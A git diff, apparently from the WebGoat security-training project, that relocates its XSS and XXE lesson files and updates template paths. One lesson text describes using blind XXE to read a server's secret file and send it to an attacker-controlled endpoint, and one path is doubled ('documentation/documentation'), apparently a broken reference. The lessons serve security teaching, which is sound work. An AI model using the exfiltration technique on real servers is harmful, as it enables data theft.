rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content3.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content3.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content4.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content4.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content4.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content4.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content5.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content5.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5a.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content5a.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5a.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content5a.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5b.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content5b.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content5b.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content5b.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content6.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content6.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6a.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content6a.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6a.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content6a.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6b.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content6b.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content6b.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content6b.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7-off.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7-off.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7-off.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7-off.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7b.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7b.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7b.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7b.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7c.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7c.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content7c.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content7c.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8a.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8a.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8a.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8a.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8b.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8b.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8b.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8b.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8c.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8c.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content8c.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content8c.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content9.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_content9.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_content9.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_content9.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_plan.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_plan.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_plan.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_plan.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_quiz.adoc b/src/main/resources/lessons/xss/documentation/CrossSiteScripting_quiz.adoc
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/lessonPlans/en/CrossSiteScripting_quiz.adoc
rename to src/main/resources/lessons/xss/documentation/CrossSiteScripting_quiz.adoc
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScripting.html b/src/main/resources/lessons/xss/html/CrossSiteScripting.html
similarity index 79%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScripting.html
rename to src/main/resources/lessons/xss/html/CrossSiteScripting.html
index 93f4d6d09..62c7b0bae 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScripting.html
+++ b/src/main/resources/lessons/xss/html/CrossSiteScripting.html
@@ -3,11 +3,11 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_plan.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_plan.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content1.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content1.adoc"></div>
 	<div class="attack-container">
 		<div id="lessonContent">
 			<form class="attack-form" accept-charset="UNKNOWN"
@@ -28,20 +28,20 @@
 	</div>
 </div>
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content2.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content2.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content3.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content3.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content4.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content4.adoc"></div>
 </div>
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content5.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content5.adoc"></div>
 	<img align="middle" th:src="@{/images/Reflected-XSS.png}" />
 </div>
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content5a.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content5a.adoc"></div>
 	<div class="attack-container">
 		<div id="lessonContent">
 			<form class="attack-form" accept-charset="UNKNOWN"
@@ -119,16 +119,16 @@
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content5b.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content5b.adoc"></div>
 
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content6.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content6.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content6a.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content6a.adoc"></div>
 	<div class="attack-container">
 		<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 		<form class="attack-form" accept-charset="UNKNOWN"
@@ -143,7 +143,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content6b.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content6b.adoc"></div>
 	<div class="attack-container">
 		<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 		<form class="attack-form" accept-charset="UNKNOWN"
@@ -162,7 +162,7 @@
 	<link rel="stylesheet" type="text/css" th:href="@{/css/quiz.css}"/>
 	<script th:src="@{/js/quiz.js}" language="JavaScript"></script>
 	<link rel="import" type="application/json" th:href="@{/lesson_js/questions.json}"/>
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_quiz.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_quiz.adoc"></div>
 	<div class="attack-container">
 		<div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
 		<div class="container-fluid">
@@ -178,4 +178,4 @@
 		<div class="attack-output"></div>
 	</div>
 </div>
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScriptingMitigation.html b/src/main/resources/lessons/xss/html/CrossSiteScriptingMitigation.html
similarity index 76%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScriptingMitigation.html
rename to src/main/resources/lessons/xss/html/CrossSiteScriptingMitigation.html
index 2139c7688..6d75d6541 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScriptingMitigation.html
+++ b/src/main/resources/lessons/xss/html/CrossSiteScriptingMitigation.html
@@ -3,23 +3,23 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScriptingMitigation_plan.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScriptingMitigation_plan.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content8.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content8.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content8a.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content8a.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content9.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content9.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content8b.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content8b.adoc"></div>
 	<div class="attack-container" style="height: 100%; border: none !important;min-height: 450px;">
 		<form id="codesubmit" style="height: 100%; min-height: 350px;" class="attack-form" accept-charset="UNKNOWN" method="POST" name="form" action="/WebGoat/CrossSiteScripting/attack3">
 			<div>
@@ -39,7 +39,7 @@
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content8c.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content8c.adoc"></div>
 	<div class="attack-container" style="height: 100%; border: none !important;min-height: 450px;">
 		<form id="codesubmit2" style="height: 100%; min-height: 350px;" class="attack-form" accept-charset="UNKNOWN" method="POST" name="form" action="/WebGoat/CrossSiteScripting/attack4">
 			<div>
@@ -58,4 +58,4 @@
 	</div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScriptingStored.html b/src/main/resources/lessons/xss/html/CrossSiteScriptingStored.html
similarity index 82%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScriptingStored.html
rename to src/main/resources/lessons/xss/html/CrossSiteScriptingStored.html
index 1bb9b0a94..4228ba985 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/resources/html/CrossSiteScriptingStored.html
+++ b/src/main/resources/lessons/xss/html/CrossSiteScriptingStored.html
@@ -3,16 +3,16 @@
 <html xmlns:th="http://www.thymeleaf.org">
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScriptingStored_plan.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScriptingStored_plan.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content7.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content7.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
 
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content7b.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content7b.adoc"></div>
 
 	<!-- comment area -->
 	<link rel="stylesheet" type="text/css" th:href="@{/lesson_css/stored-xss.css}"/>
@@ -59,7 +59,7 @@
 	</div>
 	<!-- end comments -->
 
-	<div class="adoc-content" th:replace="doc:CrossSiteScripting_content7c.adoc"></div>
+	<div class="adoc-content" th:replace="doc:lessons/xss/documentation/CrossSiteScripting_content7c.adoc"></div>
 
 	<div class="attack-container">
 		<!-- this will be where they can store the additional comment -->
@@ -76,4 +76,4 @@
 	</div>
 </div>
 
-</html>
\ No newline at end of file
+</html>
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels.properties b/src/main/resources/lessons/xss/i18n/WebGoatLabels.properties
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/i18n/WebGoatLabels.properties
rename to src/main/resources/lessons/xss/i18n/WebGoatLabels.properties
diff --git a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels_de.properties b/src/main/resources/lessons/xss/i18n/WebGoatLabels_de.properties
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels_de.properties
rename to src/main/resources/lessons/xss/i18n/WebGoatLabels_de.properties
diff --git a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels_fr.properties b/src/main/resources/lessons/xss/i18n/WebGoatLabels_fr.properties
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels_fr.properties
rename to src/main/resources/lessons/xss/i18n/WebGoatLabels_fr.properties
diff --git a/webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels_ru.properties b/src/main/resources/lessons/xss/i18n/WebGoatLabels_ru.properties
similarity index 100%
rename from webgoat-lessons/sql-injection/src/main/resources/i18n/WebGoatLabels_ru.properties
rename to src/main/resources/lessons/xss/i18n/WebGoatLabels_ru.properties
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/images/Reflected-XSS.png b/src/main/resources/lessons/xss/images/Reflected-XSS.png
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/images/Reflected-XSS.png
rename to src/main/resources/lessons/xss/images/Reflected-XSS.png
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/images/Stored-XSS.png b/src/main/resources/lessons/xss/images/Stored-XSS.png
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/images/Stored-XSS.png
rename to src/main/resources/lessons/xss/images/Stored-XSS.png
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/images/avatar1.png b/src/main/resources/lessons/xss/images/avatar1.png
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/images/avatar1.png
rename to src/main/resources/lessons/xss/images/avatar1.png
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/js/assignment3.js b/src/main/resources/lessons/xss/js/assignment3.js
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/js/assignment3.js
rename to src/main/resources/lessons/xss/js/assignment3.js
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/js/assignment4.js b/src/main/resources/lessons/xss/js/assignment4.js
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/js/assignment4.js
rename to src/main/resources/lessons/xss/js/assignment4.js
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/js/questions_cross_site_scripting.json b/src/main/resources/lessons/xss/js/questions_cross_site_scripting.json
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/js/questions_cross_site_scripting.json
rename to src/main/resources/lessons/xss/js/questions_cross_site_scripting.json
diff --git a/webgoat-lessons/cross-site-scripting/src/main/resources/js/stored-xss.js b/src/main/resources/lessons/xss/js/stored-xss.js
similarity index 100%
rename from webgoat-lessons/cross-site-scripting/src/main/resources/js/stored-xss.js
rename to src/main/resources/lessons/xss/js/stored-xss.js
diff --git a/webgoat-lessons/xxe/src/main/resources/css/xxe.css b/src/main/resources/lessons/xxe/css/xxe.css
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/css/xxe.css
rename to src/main/resources/lessons/xxe/css/xxe.css
diff --git a/webgoat-lessons/xxe/src/main/resources/csv/flights.txt b/src/main/resources/lessons/xxe/csv/flights.txt
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/csv/flights.txt
rename to src/main/resources/lessons/xxe/csv/flights.txt
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc b/src/main/resources/lessons/xxe/documentation/XXE_blind.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_blind.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc b/src/main/resources/lessons/xxe/documentation/XXE_blind_assignment.adoc
similarity index 86%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_blind_assignment.adoc
index f80227542..ba4c6aded 100644
--- a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_blind_assignment.adoc
+++ b/src/main/resources/lessons/xxe/documentation/XXE_blind_assignment.adoc
@@ -7,10 +7,10 @@ In the previous page we showed you how you can ping a server with a XXE attack,
 |OS |Location
 
 |`operatingSystem:os[]`
-|`webGoatTempDir:temppath[]/XXE/secret.txt`
+|`webGoatTempDir:temppath[]/XXE/username:user[]/secret.txt`
 
 |===
 
 Try to upload this file using WebWolf landing page for example: `webWolfRootLink:landing?text=contents_file[noLink,target=landing]`
 (NOTE: this endpoint is under your full control)
-Once you obtained the contents of the file post it as a new comment on the page, and you will solve the lesson.
\ No newline at end of file
+Once you obtained the contents of the file post it as a new comment on the page, and you will solve the lesson.
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_changing_content_type.adoc b/src/main/resources/lessons/xxe/documentation/XXE_changing_content_type.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_changing_content_type.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_changing_content_type.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_changing_content_type_solution.adoc b/src/main/resources/lessons/xxe/documentation/XXE_changing_content_type_solution.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_changing_content_type_solution.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_changing_content_type_solution.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_code.adoc b/src/main/resources/lessons/xxe/documentation/XXE_code.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_code.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_code.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc b/src/main/resources/lessons/xxe/documentation/XXE_intro.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_intro.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_intro.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_mitigation.adoc b/src/main/resources/lessons/xxe/documentation/XXE_mitigation.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_mitigation.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_mitigation.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_overflow.adoc b/src/main/resources/lessons/xxe/documentation/XXE_overflow.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_overflow.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_overflow.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_plan.adoc b/src/main/resources/lessons/xxe/documentation/XXE_plan.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_plan.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_plan.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_simple.adoc b/src/main/resources/lessons/xxe/documentation/XXE_simple.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_simple.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_simple.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_simple_introduction.adoc b/src/main/resources/lessons/xxe/documentation/XXE_simple_introduction.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_simple_introduction.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_simple_introduction.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_simple_solution.adoc b/src/main/resources/lessons/xxe/documentation/XXE_simple_solution.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_simple_solution.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_simple_solution.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_static_code_analysis.adoc b/src/main/resources/lessons/xxe/documentation/XXE_static_code_analysis.adoc
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/XXE_static_code_analysis.adoc
rename to src/main/resources/lessons/xxe/documentation/XXE_static_code_analysis.adoc
diff --git a/webgoat-lessons/xxe/src/main/resources/lessonPlans/en/temp.txt b/src/main/resources/lessons/xxe/documentation/temp.txt
similarity index 100%
rename from webgoat-lessons/xxe/src/main/resources/lessonPlans/en/temp.txt
rename to src/main/resources/lessons/xxe/documentation/temp.txt
diff --git a/webgoat-lessons/xxe/src/main/resources/html/XXE.html b/src/main/resources/lessons/xxe/html/XXE.html
similarity index 85%
rename from webgoat-lessons/xxe/src/main/resources/html/XXE.html
rename to src/main/resources/lessons/xxe/html/XXE.html
index e2cc3685e..dc60f5553 100644
--- a/webgoat-lessons/xxe/src/main/resources/html/XXE.html
+++ b/src/main/resources/lessons/xxe/html/XXE.html
@@ -5,19 +5,19 @@
 <body>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_plan.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_plan.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_intro.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_intro.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_simple_introduction.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_simple_introduction.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_simple.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_simple.adoc"></div>
     <link rel="stylesheet" type="text/css" th:href="@{/lesson_css/xxe.css}"/>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -77,16 +77,16 @@
 
 <div class="lesson-page-wrapper">
     <div class="lesson-page-solution">
-        <div class="adoc-content" th:replace="doc:XXE_simple_solution.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_simple_solution.adoc"></div>
     </div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_code.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_code.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_changing_content_type.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_changing_content_type.adoc"></div>
     <div class="attack-container">
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
         <form class="attack-form" accept-charset="UNKNOWN"
@@ -144,20 +144,20 @@
 
 <div class="lesson-page-wrapper">
     <div class="lesson-page-solution">
-        <div class="adoc-content" th:replace="doc:XXE_changing_content_type_solution.adoc"></div>
+        <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_changing_content_type_solution.adoc"></div>
     </div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_overflow.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_overflow.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_blind.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_blind.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_blind_assignment.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_blind_assignment.adoc"></div>
     <div class="attack-container">
         <img th:src="@{/images/wolf-enabled.png}" class="webwolf-enabled"/>
         <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
@@ -215,11 +215,11 @@
 
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_mitigation.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/documentation/XXE_mitigation.adoc"></div>
 </div>
 
 <div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:XXE_static_code_analysis.adoc"></div>
+    <div class="adoc-content" th:replace="doc:lessons/xxe/documentation/XXE_static_code_analysis.adoc"></div>
     <br/>
     <a id="submitlink" class="btn btn-primary" href="" onclick="javascript:$('#patchbutton').load('/WebGoat/service/enable-security.mvc');return false;"><span id="patchbutton">Apply XXE security patch</span></a>
 </div>
